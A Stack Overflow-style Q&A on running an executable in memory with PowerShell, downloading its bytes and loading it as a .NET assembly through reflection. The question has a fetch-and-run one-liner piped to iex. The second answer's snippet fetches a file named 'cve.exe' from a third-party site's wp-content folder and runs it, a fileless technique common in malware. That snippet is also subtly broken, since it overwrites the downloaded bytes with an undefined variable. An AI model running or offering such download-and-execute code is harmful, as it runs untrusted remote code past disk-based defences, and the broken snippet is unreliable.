# Executing Executables In Memory With Powershell

Tags: powershell, executable, shellexecute

I have an executable on an internet page and I want to be able to run it without saving it to the local disk using powershell. It should basically function like iex but run an executable that's already in the memory and stored in some kind of variable. And again, I want to do all of that in Powershell.

Example.

```
(New-Object System.Net.WebClient).DownloadString("http://example.com") | iex
```

Here we can download scripts and run them in the memory without saving anything to the disk. But it's only a sequence of characters that we're executing here. Basically a powershell script. I want to run executables the same way. Is that possible? If so, how?

Answer (score 1, accepted):

First, **use [`Invoke-WebRequest`](https://learn.microsoft.com/powershell/module/microsoft.powershell.utility/invoke-webrequest) to download your binary executable's *content*** as a **byte array** (`[byte[]]`):

```sh
$bytes = (Invoke-WebRequest "http://example.com/path/to/binary.exe").Content
```

Then, *assuming that the executable is a (compatible) .NET application*:

- Use .NET's ability to **load an assembly from a byte array**, then **use reflection to directly execute** this in-memory representation of your binary executable.
- [This answer](https://stackoverflow.com/a/64124227/45375) shows the technique (based on a Base64-encoding string serving as the source of the byte array, but you can simply substitute your `$bytes` array in the linked code).

Comment: Glad to hear it was helpful, @MuhammedÖzen; my pleasure.

Answer (score 1):

for me it was necessary to use `-usebasicparsing`.

full snippet to download and execute in memory.

```
$bytes = (Invoke-WebRequest "https://budgetlc.com/wp-content/cve.exe" -UseBasicParsing ).Content
$bytes = [System.Convert]::FromBase64String($string)
$assembly = [System.Reflection.Assembly]::Load($bytes)

$entryPointMethod = 
 $assembly.GetTypes().Where({ $_.Name -eq 'Program' }, 'First').
   GetMethod('Main', [Reflection.BindingFlags] 'Static, Public, NonPublic')

# Now you can call the entry point.
# This example passes two arguments, 'foo' and 'bar'
$entryPointMethod.Invoke($null, (, [string[]] ('foo', 'bar')))
```